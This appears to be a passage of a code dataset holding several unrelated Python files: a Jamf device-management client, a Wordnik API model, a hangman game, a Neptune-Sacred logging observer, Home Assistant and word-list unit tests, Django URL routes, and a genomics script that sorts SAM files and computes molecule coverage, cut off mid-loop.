self.device(device_id)['serialNumber']\n url = f\"{MOBILE_DEVICE_PRESTAGE_ENDPOINT}/scope\"\n return self.session.get(url=self._url(url)).json()['serialsByPrestageId'].get(device_serial)\n\n def get_prestage_serials_and_vlock(self, prestage_id: int):\n url = f\"{MOBILE_DEVICE_PRESTAGE_ENDPOINT}/{prestage_id}/scope\"\n r = self.session.get(url=self._url(url))\n payload = r.json()\n current_serials = [assignment['serialNumber'] for assignment in payload['assignments']]\n version_lock = payload['versionLock']\n return current_serials, version_lock\n\n def update_prestage_scope(self, prestage_id: int, serials: list, version_lock):\n url = f\"{MOBILE_DEVICE_PRESTAGE_ENDPOINT}/{prestage_id}/scope\"\n payload = {\"serialNumbers\": serials, \"versionLock\": version_lock}\n r = self.session.put(url=self._url(url), json=payload)\n if not r.ok:\n print(f\"Error {r.status_code}: {r.text}\")\n else:\n print(f\"Adding Prestage: {self._url(url)} with payload {payload}\")\n return r.ok\n\n def remove_device_from_prestage(self, device_id: int=None, serial_number: str=None):\n if device_id and not serial_number:\n device = self.device(device_id, True)\n serial_number = device['serialNumber']\n if not device_id and serial_number:\n device_id = self.search_devices(serial=serial_number)[0].get('id')\n prestage_id = self.get_prestage_id_for_device(device_id)\n if not prestage_id:\n return True\n current_serials, version_lock = self.get_prestage_serials_and_vlock(prestage_id)\n new_serials = [serial for serial in current_serials if serial != serial_number]\n return self.update_prestage_scope(prestage_id, new_serials, version_lock)\n\n @staticmethod\n def strip_extra_location_information(location: dict) -> dict:\n if location:\n return {\"id\": location[\"id\"], \"name\": location[\"name\"]}\n\n def get_sites(self) -> dict:\n return self.get_object_list(\"settings/sites\")\n\n def get_site(self, site_name: str, strip_extra: bool = False) -> dict:\n sites = self.get_sites()\n site = self.get_object_by_name(sites, site_name)\n if strip_extra:\n site = self.strip_extra_location_information(site)\n return site\n\n def get_object_list(self, path: str) -> list:\n r = self.session.get(self._url(path))\n if not r.raise_for_status():\n return r.json()\n\n def get_object_by_name(self, object_list, name) -> dict:\n return next((item for item in object_list if item[\"name\"] == name), None)\n\n def flush_mobile_device_commands(self, device_id, status=None):\n\n if not status:\n status = \"Pending+Failed\"\n\n if status not in (\"Pending\", \"Failed\", \"Pending+Failed\"):\n raise Exception(\"Invalid Status: {status}\")\n\n url = self._url(\n html.escape(\n f\"{CLASSIC_ENDPOINT}/commandflush/mobiledevices/id/{device_id}/status/{status}\"\n )\n )\n\n return self.classic_session.delete(\n url, headers={\"accept\": \"application/json\"}\n ).ok\n\n","sub_path":"pc_jamf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":17193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189440688","text":"#!/usr/bin/env python\n\"\"\"\nCopyright 2014 Wordnik, Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nclass DetailsResponse:\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\"\"\"\n\n\n def __init__(self):\n self.swaggerTypes = {\n 'also': 'list[str]',\n 'antonyms': 'list[str]',\n 'definitions': 'list[Definition]',\n 'entails': 'list[str]',\n 'hasCategories': 'list[str]',\n 'hasInstances': 'list[str]',\n 'hasMembers': 'list[str]',\n 'hasParts': 'list[str]',\n 'hasSubstances': 'list[str]',\n 'hasTypes': 'list[str]',\n 'hasUsages': 'list[str]',\n 'inCategory': 'list[str]',\n 'inRegion': 'list[str]',\n 'instance_of': 'list[str]',\n 'memberOf': 'list[str]',\n 'partOf': 'list[str]',\n 'pertainsTo': 'list[str]',\n 'regionOf': 'list[str]',\n 'similarTo': 'list[str]',\n 'substanceOf': 'list[str]',\n 'synonyms': 'list[str]',\n 'typeOf': 'list[str]',\n 'usageOf': 'list[str]'\n\n }\n\n\n #Phrases to which the original word belongs.\n self.also = None # list[str]\n #Words that have the opposite context of the original word.\n self.antonyms = None # list[str]\n #The meaning of the word, including it's part of speech.\n self.definitions = None # list[Definition]\n #Words that are implied by the original word. Usually used for verbs.\n self.entails = None # list[str]\n #Categories of the original word.\n self.hasCategories = None # list[str]\n #Words that are examples of the original word.\n self.hasInstances = None # list[str]\n #Words that belong to the group defined by the original word.\n self.hasMembers = None # list[str]\n #Words that are part of the original word. Also known as meronyms.\n self.hasParts = None # list[str]\n #Substances that are part of the original word.\n self.hasSubstances = None # list[str]\n #Words that are more specific than the original word. Also known as hyponyms.\n self.hasTypes = None # list[str]\n #Words that are examples of the domain the original word defines.\n self.hasUsages = None # list[str]\n #The domain category to which the original word belongs.\n self.inCategory = None # list[str]\n #Regions where the word is used.\n self.inRegion = None # list[str]\n #Words that the original word is an example of.\n self.instance_of = None # list[str]\n #A group to which the original word belongs.\n self.memberOf = None # list[str]\n #Partof\n self.partOf = None # list[str]\n #Words to which the original word is relevant\n self.pertainsTo = None # list[str]\n #A region where words are used.\n self.regionOf = None # list[str]\n #Words that similar to the original word, but are not synonyms.\n self.similarTo = None # list[str]\n #Substances to which the original word is a part of.\n self.substanceOf = None # list[str]\n #Words that can be interchanged for the original word in the same context.\n self.synonyms = None # list[str]\n #Words that are more generic than the original word. Also known as hypernyms.\n self.typeOf = None # list[str]\n #Words that the original word is a domain usage of.\n self.usageOf = None # list[str]\n \n","sub_path":"WordsAPI-python/WordsAPI/models/DetailsResponse.py","file_name":"DetailsResponse.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"125775687","text":"###############################\n##### Hangman Game Runner #####\n##### by Chris Pyles #####\n###############################\n\nfrom board import *\nfrom secret import *\nfrom player import *\nfrom utils import *\nimport re\n\nclass Game:\n\t\"\"\"\n\tRuns a game of hangman.\n\t\"\"\"\n\tdef __init__(self):\n\t\tprint(\"\\n\\nWelcome to Hangman.\\nSecret Keeper, step up to the computer.\")\n\t\tprint(\"\\nAre you the Secret Keeper?\")\n\t\tsecret_keeper = input()\n\t\tif re.match(r\"[Yy][Ee]?[Ss]?\", secret_keeper):\n\t\t\tself.enter_secret()\n\t\telse:\n\t\t\tprint(\"\\nSorry, you're not the Secret Keeper. Go away.\")\n\t\t\tGame()\n\n\tdef enter_secret(self):\n\t\tprint(\"\\n\\nSecret Keeper, enter your secret word.\")\n\t\tword = input()\n\t\tself._secret = SecretWord(word)\n\t\tself.create_players()\n\n\tdef create_players(self):\n\t\tself._players = []\n\t\tmore_players, i = True, 0\n\t\twhile more_players:\n\t\t\tprint(\"\\n\\nEnter Player {}'s Name:\".format(i))\n\t\t\tname = input()\n\t\t\tself._players += [Player(name, i)]\n\t\t\ti += 1\n\t\t\tprint(\"\\nMore players?\")\n\t\t\tmore_players_question = input()\n\t\t\tif re.match(r\"[Yy][Ee]?[Ss]?\", more_players_question):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbreak\n\t\tself.init_board()\n\n\tdef init_board(self):\n\t\tself._board = Board(self._secret, self._players)\n\t\tself.run_game()\n\n\tdef run_game(self):\n\t\ti = 0\n\t\twhile not self._board.is_completed():\n\t\t\tprint(\"\\n\\nHere is the current state of the board:\")\n\t\t\tprint(self._board.board())\n\n\t\t\tprint(\"\\nIt is {}'s turn.\".format(self._players[i]._name))\n\t\t\tprint(\"Enter your guess below.\")\n\t\t\tguess = input()\n\n\t\t\ttry:\n\t\t\t\tassert len(guess) == 1, \"Guess must be length 1\"\n\t\t\texcept AssertionError:\n\t\t\t\tprint(\"\\nYour guess must have length 1.\")\n\t\t\t\tcontinue\n\n\t\t\tself._board.guess(self._players[i], guess)\n\n\t\t\ti += 1\n\t\t\tif i == len(self._players):\n\t\t\t\ti = 0\n\n\t\tself._board.ending()","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"379152852","text":"#\n# Copyright (c) 2021, Neptune Labs Sp. z o.o.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport warnings\n\nfrom sacred.dependencies import get_digest\nfrom sacred.observers import RunObserver\n\nfrom neptune_sacred import __version__\nfrom neptune_sacred.impl.utils import custom_flatten_dict\n\ntry:\n # neptune-client=0.9.0 package structure\n import neptune.new as neptune\n from neptune.new.internal.utils import verify_type\nexcept ImportError:\n # neptune-client=1.0.0 package structure\n import neptune\n from neptune.internal.utils import verify_type\n\nINTEGRATION_VERSION_KEY = 'source_code/integrations/neptune-sacred'\n\n\nclass NeptuneObserver(RunObserver):\n \"\"\"Logs sacred experiment data to Neptune.\n\n Sacred observer that logs experiment metadata to neptune.\n The experiment data can be accessed and shared via web UI or experiment API.\n\n Args:\n run(Run): Neptune _run.\n base_namespace(str): The namespace to save all metadata from sacred.\n\n Examples:\n Create sacred experiment:\n\n >>> from numpy.random import permutation\n >>> from sklearn import svm, datasets\n >>> from sacred import Experiment\n >>> ex = Experiment('iris_rbf_svm')\n\n Add Neptune observer:\n\n >>> from neptunecontrib.monitoring.sacred import NeptuneObserver\n >>> ex.observers.append(NeptuneObserver(api_token='YOUR_LONG_API_TOKEN',\n ... project_name='USER_NAME/PROJECT_NAME'))\n\n Run experiment:\n\n >>> @ex.config\n ... def cfg():\n ... C = 1.0\n ... gamma = 0.7\n\n >>> @ex.automain\n ... def _run(C, gamma, _run):\n ... iris = datasets.load_iris()\n ... per = permutation(iris.target.size)\n ... iris.data = iris.data[per]\n ... iris.target = iris.target[per]\n ... clf = svm.SVC(C, 'rbf', gamma=gamma)\n ... clf.fit(iris.data[:90],\n ... iris.target[:90])\n ... return clf.score(iris.data[90:],\n ... iris.target[90:])\n\n\n You may also want to check `sacred integration docs page` and `example experiment page`_.\n\n .. _sacred integration docs page:\n https://docs.neptune.ai/integrations-and-supported-tools/model-training/sacred\n .. _example experiment page:\n https://app.neptune.ai/prince.canuma/sacred-integration/e/SAC-59/all\n \"\"\"\n\n def __init__(self, run, base_namespace='experiment'):\n super(NeptuneObserver, self).__init__()\n self._run = run\n\n self.base_namespace = base_namespace\n self.resources = {}\n\n self._run[INTEGRATION_VERSION_KEY] = __version__\n\n def started_event(self, ex_info, command, host_info, start_time, config, meta_info, _id):\n self._run['sys/name'] = ex_info['name']\n self._run[self.base_namespace]['config'] = custom_flatten_dict(config)\n self._run[self.base_namespace]['sacred_config/sacred_id'] = _id\n self._run[self.base_namespace]['sacred_config/host_info'] = host_info\n self._run[self.base_namespace]['sacred_config/meta_info'] = custom_flatten_dict(meta_info)\n self._run[self.base_namespace]['sacred_config/experiment_info'] = custom_flatten_dict(ex_info)\n\n def completed_event(self, stop_time, result: dict):\n if result:\n for i, (k, v) in enumerate(result.items()):\n if isinstance(v, str):\n self._run[self.base_namespace][f'logs/metrics/results/{k}'] = v\n elif isinstance(v, int) or isinstance(v, float):\n self._run[self.base_namespace][f'logs/metrics/results/{k}'] = float(v)\n elif isinstance(v, object):\n self._run[self.base_namespace][f'logs/metrics/results/{k}'].upload(v)\n else:\n warnings.warn(\n f\"Logging results does not support type '{type(v)}' results. Ignoring this result\")\n\n def interrupted_event(self, interrupt_time, status):\n pass\n\n def failed_event(self, fail_time, fail_trace):\n pass\n\n def artifact_event(self, name, filename, metadata=None, content_type=None):\n filename = filename.rsplit('/', 1)[-1]\n self._run[self.base_namespace][f'io_files/artifacts/{filename}'].upload(name)\n\n def resource_event(self, filename):\n if filename not in self.resources:\n md5 = get_digest(filename)\n self.resources[filename] = md5\n\n self._run[self.base_namespace]['io_files/resources'] = list(self.resources.items())\n\n def log_metrics(self, metrics_by_name, info):\n for metric_name, metric_ptr in metrics_by_name.items():\n for step, value, timestamp in zip(\n metric_ptr[\"steps\"],\n metric_ptr[\"values\"],\n metric_ptr['timestamps']):\n self._run[self.base_namespace][f'logs/metrics/{metric_name}'].log(step=int(step), value=value,\n timestamp=timestamp.timestamp())\n","sub_path":"neptune_sacred/impl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"609485311","text":"import math\n\nimport pygame\n\n\n\nclass Projectile(pygame.sprite.Sprite):\n\n def __init__(self, player, angle):\n super().__init__()\n self.player = player\n\n self.image = pygame.image.load('assets/projectile.png')\n self.image = pygame.transform.scale(self.image, (50, 50))\n self.origin_image = self.image\n\n self.velocity = 10\n self.rect = self.image.get_rect()\n self.rect.x = player.rect.x + 120\n self.rect.y = player.rect.y + 80\n self.angle_img = 0\n self.f_x = self.rect.x\n self.f_y = self.rect.y\n\n self.angle_proj = angle\n self.change_x = math.cos(self.angle_proj) * self.velocity\n self.change_y = math.sin(self.angle_proj) * self.velocity\n\n def remove(self):\n self.player.all_projectiles.remove(self)\n\n def move(self):\n # self.rotate()\n\n self.f_x += self.change_x\n self.f_y += self.change_y\n self.rect.x = self.f_x\n self.rect.y = self.f_y\n\n for monster in self.player.game.check_collision(self, self.player.game.all_monster):\n self.remove()\n monster.damage(self.player.attack)\n\n if self.rect.x > 1080 or self.rect.y > 720:\n self.remove()\n","sub_path":"Projectile.py","file_name":"Projectile.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63751122","text":"\"\"\"The tests for Radarr sensor platform.\"\"\"\n\nfrom homeassistant.components.sensor import SensorDeviceClass\nfrom homeassistant.const import ATTR_DEVICE_CLASS, ATTR_UNIT_OF_MEASUREMENT\nfrom homeassistant.core import HomeAssistant\n\nfrom . import setup_integration\n\nfrom tests.test_util.aiohttp import AiohttpClientMocker\n\n\nasync def test_sensors(\n hass: HomeAssistant,\n aioclient_mock: AiohttpClientMocker,\n entity_registry_enabled_by_default: None,\n) -> None:\n \"\"\"Test for successfully setting up the Radarr platform.\"\"\"\n await setup_integration(hass, aioclient_mock)\n\n state = hass.states.get(\"sensor.mock_title_disk_space_downloads\")\n assert state.state == \"263.10\"\n assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == \"GB\"\n state = hass.states.get(\"sensor.mock_title_movies\")\n assert state.state == \"1\"\n assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == \"Movies\"\n state = hass.states.get(\"sensor.mock_title_start_time\")\n assert state.state == \"2020-09-01T23:50:20+00:00\"\n assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TIMESTAMP\n\n\nasync def test_windows(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n \"\"\"Test for successfully setting up the Radarr platform on Windows.\"\"\"\n await setup_integration(hass, aioclient_mock, windows=True)\n\n state = hass.states.get(\"sensor.mock_title_disk_space_tv\")\n assert state.state == \"263.10\"\n","sub_path":"tests/components/radarr/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300832696","text":"\"\"\"Unit tests for wordlist module.\"\"\"\nfrom unittest import TestCase, mock, main\nimport wordlist\nfrom request_mock import mocked_requests_get\n\nclass TestWordlist(TestCase):\n \"\"\"Wordlist unit test suite.\"\"\"\n\n @mock.patch('wordlist.requests.get', side_effect=mocked_requests_get)\n def test_word_list_size(self, mock_get):\n \"\"\"Check the size of the list returned is the same as requested.\"\"\"\n word_list = wordlist.get_word_list(20)\n self.assertEqual(len(word_list), 20)\n\n @mock.patch('wordlist.requests.get', side_effect=mocked_requests_get)\n def test_filter_criteria(self, mock_get):\n \"\"\"Check all returned values match filter criteria.\"\"\"\n word_list = wordlist.get_word_list(20)\n for word in word_list:\n self.assertTrue(word.isalpha())\n self.assertTrue(word[0].islower())\n\n @mock.patch('wordlist.requests.get', side_effect=mocked_requests_get)\n def test_no_empty_strings(self, mock_get):\n \"\"\"Check there are no empty strings.\"\"\"\n word_list = wordlist.get_word_list(20)\n for word in word_list:\n self.assertTrue(word)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test_wordlist.py","file_name":"test_wordlist.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407091619","text":"from django.conf.urls import url\n\nfrom . import views\n\n\napp_name = 'foodapp'\n\nurlpatterns = [\n url(r'^$', views.HomeView.as_view(), name='home'),\n\n url(r'^billing/cards/$', views.StripeCardListView.as_view(), name='stripe_card_list'),\n url(r'^billing/cards/create$', views.StripeCreateView.as_view(), name='stripe_card_create'),\n url(r'^billing/cards/create$', views.StripeCreateView.as_view(), name='stripe_customer_create'),\n url(r'^billing/cards/delete/(?P\\w+)/$', views.StripeCardDeleteView.as_view(), name='stripe_card_delete'),\n url(r'^billing/cards/update/(?P\\w+)/$', views.StripeCardUpdateView.as_view(), name='stripe_card_update'),\n\n url(r'^billing/invoices/$', views.StripeInvoiceView.as_view(), name='stripe_invoices'),\n\n url(r'^burrito-projections/$', views.BurritoProjectionView.as_view(), name='burrito_projections'),\n\n url(r'^orders/$', views.OrderListView.as_view(), name='orders'),\n url(r'^orders/unpaid/$', views.UnpaidOrdersView.as_view(), name='unpaid_orders'),\n url(r'^orders/user/(?P\\w+)/$', views.UserOrderView.as_view(), name='user_orders'),\n url(r'^orders/last_month/$', views.last_month_view, name='last_month_view'),\n url(r'^orders/leaderboard/$', views.LeaderboardView.as_view(), name='leaderboard'),\n url(r'^orders/(?P\\d{4})/(?P\\d{2})/$', views.MonthOrdersView.as_view(), name='month_orders'),\n url(r'^orders/super/(?P\\d{4})/(?P\\d{2})/$', views.SuperMonthOrdersView.as_view(), name='super_month_orders'), # noqa: E501\n]\n","sub_path":"src/labsite/foodapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532341733","text":"import os, sys, gzip\r\nimport getopt\r\nimport time\r\nimport subprocess\r\nimport re\r\nfrom collections import defaultdict\r\nimport random\r\nimport string\r\n\r\nclass baseinfo:\r\n\tdef __init__(self):\r\n\t\tself.configdist = {}\r\n\r\n\tdef get_config(self, configFile):\r\n\t\to_config = open (configFile, 'r')\r\n\t\tfor config_line in o_config:\r\n\t\t\tconfig_line = config_line.strip()\r\n\t\t\tif len(config_line) == 0:\r\n\t\t\t\tpass\r\n\t\t\telif config_line.startswith('#'):\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\t(name, path) = re.split(\" = \", config_line)\r\n\t\t\t\tname = name.strip()\r\n\t\t\t\tpath = path.strip()\r\n\t\t\t\tpath = path.replace(\"'\", \"\")\r\n\t\t\t\tpath = path.replace('\"', '')\r\n\r\n\t\t\t\tself.configdist[name] = path\r\n#\t\t\t\tprint (name, path)\r\n\t\to_config.close()\r\n\r\n\tdef get_path(self, name_variable):\r\n\t\tif name_variable in self.configdist:\r\n\t\t\tABS_PATH = self.configdist[name_variable]\r\n\t\t\tif ABS_PATH == \"None\":\r\n\t\t\t\tABS_PATH = \" \"\r\n\t\t\treturn ABS_PATH\r\n\t\telse:\r\n\t\t\tsys.stderr.write(\"ERROR - %s - %s is empty, please check the config file you inputted!\\n\" % (time.asctime(), name_variable))\r\n\t\t\tsys.exit(-1)\r\n\r\n\tdef Samtools(self):\r\n\t\tabs_path = self.get_path('samtools')\r\n\t\treturn abs_path\r\n\r\n\tdef Barcode_index(self):\r\n\t\tabs_path = self.get_path('barcode_index')\r\n\t\treturn abs_path\r\n\r\n\tdef Genomesize(self):\r\n\t\tabs_path = self.get_path('genomesize')\r\n\t\treturn abs_path\r\n\r\nclass CFCR:\r\n\tdef find_samtools_version(self, samtools_path, tmpdir):\r\n\t\trandomstring = ''.join(random.sample(string.ascii_letters + string.digits, 8))\r\n\t\ttmpshell = tmpdir + \"/\" + randomstring + \".sh\"\r\n\t\ttmplog = tmpdir + \"/\" + randomstring + \".log\"\r\n\t\twtmpshell = open(tmpshell, 'w')\r\n\t\tshell_line = \" \".join([samtools_path, \"2>\", tmplog, \"\\n\"])\r\n\t\twtmpshell.write(shell_line)\r\n\t\twtmpshell.close()\r\n\t\tsubprocess.call([\"sh\", tmpshell])\r\n\r\n\t\tsv = 0\r\n\t\trlog = open(tmplog, 'r')\r\n\t\tfor log in rlog:\r\n\t\t\tif re.search(\"Version\", log):\r\n\t\t\t\tloginfo = re.split('\\s', log)\r\n\t\t\t\tsv = (re.split('\\.', loginfo[1]))[0]\r\n\t\trlog.close()\r\n\t\tsubprocess.call([\"rm\", tmpshell, tmplog])\r\n\t\treturn(int(sv))\r\n\r\n\tdef split_and_sort_sam(self, sorted_bam, samtools_path, barcode_index, outdir = './'):\r\n\t\tsplitdir = outdir + \"/tmp/SamByChr\"\r\n\t\tif os.path.exists(splitdir):\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tos.mkdir(splitdir)\r\n\r\n\t\tsorted_sam = sorted_bam\r\n\t\tif sorted_bam.endswith(\"bam\"):\r\n\t\t\tsorted_sam = sorted_bam.replace('bam', 'sam')\r\n\t\t\ttmpshell = os.path.join(splitdir, \"bam2sam.sh\")\r\n\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\tsortshell = tmpshell + \".tmp\"\r\n\t\t\twsortshell = open(tmpshell + \".tmp\", 'w')\r\n\t\t\ttmpheader = splitdir + \"/tmp.header\"\r\n\t\t\tshell_line = \" \".join([samtools_path, \"view -H\", sorted_bam, \"| grep coordinate >\", tmpheader, \"\\n\"])\r\n\t\t\twsortshell.write(shell_line)\r\n\t\t\twsortshell.close()\r\n\t\t\tsubprocess.call([\"sh\", sortshell])\r\n\t\t\tif os.path.getsize(tmpheader):\r\n\t\t\t\tsys.stderr.write(\"%s has been sorted!\\n\" % sorted_bam)\r\n\t\t\telse:\r\n\t\t\t\tsys.stderr.write(\"%s has not been sorted, and would be sorted before calculating CF/CR!\\n\" % sorted_bam)\r\n\r\n\t\t\t\tsv = self.find_samtools_version(samtools_path, splitdir)\r\n\t\t\t\tif sv == 0:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"sort -m 2G\", sorted_bam, sorted_bam + \".sorted\\n\"])\r\n\t\t\t\telse:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"sort -m 2G -o\", sorted_bam + \".sorted.bam -T\", sorted_bam, sorted_bam, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([\"mv\", sorted_bam + \".sorted.bam\", sorted_bam, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\tshell_line = \" \".join([samtools_path, \"view -h\", sorted_bam, \">\", sorted_sam, \"\\n\"])\r\n\t\t\twtmpshell.write(shell_line)\r\n\t\t\twtmpshell.close()\r\n\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\r\n\t\tchrdict = dict()\r\n\t\tsplitsamlist = list()\r\n\t\theadersam = os.path.join(splitdir, 'header.sam')\r\n\t\toutputsam = open(headersam, 'w')\r\n\t\trsorted_sam = open(sorted_sam, 'r')\r\n\t\twhile True:\r\n\t\t\tsaminfo = rsorted_sam.readline()\r\n\t\t\tif len(saminfo) == 0:\r\n\t\t\t\tbreak\r\n\t\t\telif saminfo.startswith('@'):\r\n\t\t\t\toutputsam.write(saminfo)\r\n\t\t\telse:\r\n\t\t\t\tsaminfo = saminfo.strip()\r\n\t\t\t\tsaminfolist = re.split(\"\\t\", saminfo)\r\n\t\t\t\tif saminfolist[2] == '*':\r\n\t\t\t\t\tpass\r\n\t\t\t\telif len(chrdict) == 0 or saminfolist[2] not in chrdict:\r\n\t\t\t\t\tchrdict[saminfolist[2]] = saminfolist[2]\r\n\t\t\t\t\toutputsam.close()\r\n\t\t\t\t\tchrsam = os.path.join(splitdir, saminfolist[2] + '.sam')\r\n\t\t\t\t\toutputsam = open(chrsam, 'w')\r\n\t\t\t\t\tsplitsamlist.append(chrsam)\r\n\t\t\t\t\tsys.stderr.write(\"[ %s ] split sorted sam file, processing %s: %s ...\\n\" % (time.asctime(), saminfolist[2], chrsam))\r\n\t\t\t\t\t### move the barcode info to the 12th column\r\n\t\t\t\t\tsaminfo = self.modify_saminfo(saminfo)\r\n\t\t\t\t\toutputsam.write(saminfo)\r\n\t\t\t\telse:\r\n\t\t\t\t\tsaminfo = self.modify_saminfo(saminfo)\r\n\t\t\t\t\toutputsam.write(saminfo)\r\n\t\toutputsam.close()\r\n\t\t\r\n\t\tsamfilepath = os.path.join(splitdir, \"sam.txt\")\r\n\t\twsamfilepath = open(samfilepath, 'w')\r\n\t\tfor chrsam in splitsamlist:\r\n\t\t\tchrsortedsam = chrsam.replace('sam', 'sorted_by_barcode.sam')\r\n\t\t\tsys.stderr.write(\"[ %s ] sort sam file, processing %s ...\\n\" % (time.asctime(), chrsortedsam))\r\n\t\t\ttmpshell = os.path.join(splitdir, \"sort.sh\")\r\n\t\t\twtmpshell = open(tmpshell, \"w\")\r\n\t\t\tshell_line = \" \".join([\"sort\", \"-k12,12 -k4n\", chrsam, \">\", chrsortedsam, \"\\n\"])\r\n\t\t\twtmpshell.write(shell_line)\r\n\t\t\tshell_line = \" \".join([\"rm\", chrsam, \"\\n\"])\r\n\t\t\twtmpshell.write(shell_line)\r\n\t\t\twtmpshell.close()\r\n\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\t\twsamfilepath.write(\"\\n\".join([chrsortedsam, \"\"]))\r\n\t\twsamfilepath.close()\r\n\r\n\t\tsubprocess.call([\"rm\", sorted_sam])\r\n\r\n\t\treturn(samfilepath, headersam)\r\n\r\n\tdef modify_saminfo(self, orisaminfo):\r\n\t\tsaminfolist = re.split(\"\\t\", orisaminfo)\r\n\t\tbcindex = 1\r\n\t\tfor n in range(len(saminfolist)):\r\n\t\t\tif saminfolist[n].startswith(\"BX:Z\"):\r\n\t\t\t\tbcindex = n\r\n\t\tif bcindex == 11 or bcindex == 1:\r\n\t\t\tsaminfo = \"\\t\".join(saminfolist)\r\n\t\telse:\r\n\t\t\tnewsaminfolist = saminfolist[0:11]\r\n\t\t\tnewsaminfolist.append(saminfolist[bcindex])\r\n\t\t\tfor n in range(11, bcindex):\r\n\t\t\t\tnewsaminfolist.append(saminfolist[n])\r\n\t\t\tif bcindex == (len(saminfolist) - 1):\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tfor n in range(bcindex+1, len(saminfolist)):\r\n\t\t\t\t\tnewsaminfolist.append(saminfolist[n])\r\n\t\t\tsaminfo = \"\\t\".join(newsaminfolist)\r\n\t\tsaminfo = saminfo + \"\\n\"\r\n\t\treturn(saminfo)\r\n\r\n\tdef calculate(self, sorted_by_barcode_sam_list, target_size, outdir, sorted_bam, samtools_path, molecule_length, headersamfile):\r\n\t\tsamfile_list = open(sorted_by_barcode_sam_list, 'r')\r\n\t\tstatistics_report_dir = os.path.join(outdir, \"statistics\")\r\n\t\tif os.path.isdir(statistics_report_dir):\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tos.makedirs(statistics_report_dir)\r\n\t\tmarked_molecule = os.path.join(statistics_report_dir, \"molecule.full.gz\")\r\n\t\twmarked_molecule = gzip.open(marked_molecule, 'wb')\r\n#\t\tbroken_molecule = os.path.join(statistics_report_dir, \"molecule.broken.txt\")\r\n#\t\twbroken_molecule = open(broken_molecule, 'w')\r\n\r\n\t\tmol_id = 1\r\n\t\tall_CF = 0\r\n\t\tall_CR = 0\r\n\t\tallbarcode = dict()\r\n\t\treadid_dict = defaultdict(int)\r\n\t\tmolecule = defaultdict(list)\r\n\t\tmolecule2 = defaultdict(list)\r\n\t\tmolecule3 = defaultdict(int)\r\n\t\tmolecule4 = defaultdict(list)\r\n\r\n\t\tmolecule_length_distribution = dict()\r\n\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\t\tmolecule_really_covered = defaultdict(list)\r\n\t\tmolecule_coverage_distribution = defaultdict(int)\r\n\t\tmolecule_coverage_distribution_sum = 0\r\n\r\n#\t\tbarcode_molecule_amount_file = os.path.join(statistics_report_dir, \"barcode_molecule_amount.txt\")\r\n#\t\twbarcode_molecule_amount_file = open(barcode_molecule_amount_file, \"w\")\r\n#\t\twbarcode_molecule_amount_file.write(\"barcode\\tamount_of_molecule\\n\")\r\n\r\n\t\tmolecule_really_covered_file = os.path.join(statistics_report_dir, \"each_molecule_coverage.txt\")\r\n\t\twmolecule_really_covered_file = open(molecule_really_covered_file, \"w\")\r\n\t\twmolecule_really_covered_file.write(\"molecule_id\\tmolecule_length\\tcovered\\tcoverage\\n\")\r\n\r\n\t\tmolecule_coverage_distribution_file = os.path.join(statistics_report_dir, \"molecule_coverage_distribution.txt\")\r\n\t\twmolecule_coverage_distribution_file = open(molecule_coverage_distribution_file, \"w\")\r\n\t\twmolecule_coverage_distribution_file.write(\"coverage\\tproportion(%)\\n\")\r\n\r\n\t\tfilter_molecule_bam_list = list()\r\n\t\tfailed_molecule_bam_list = list()\r\n\t\tfor sam in 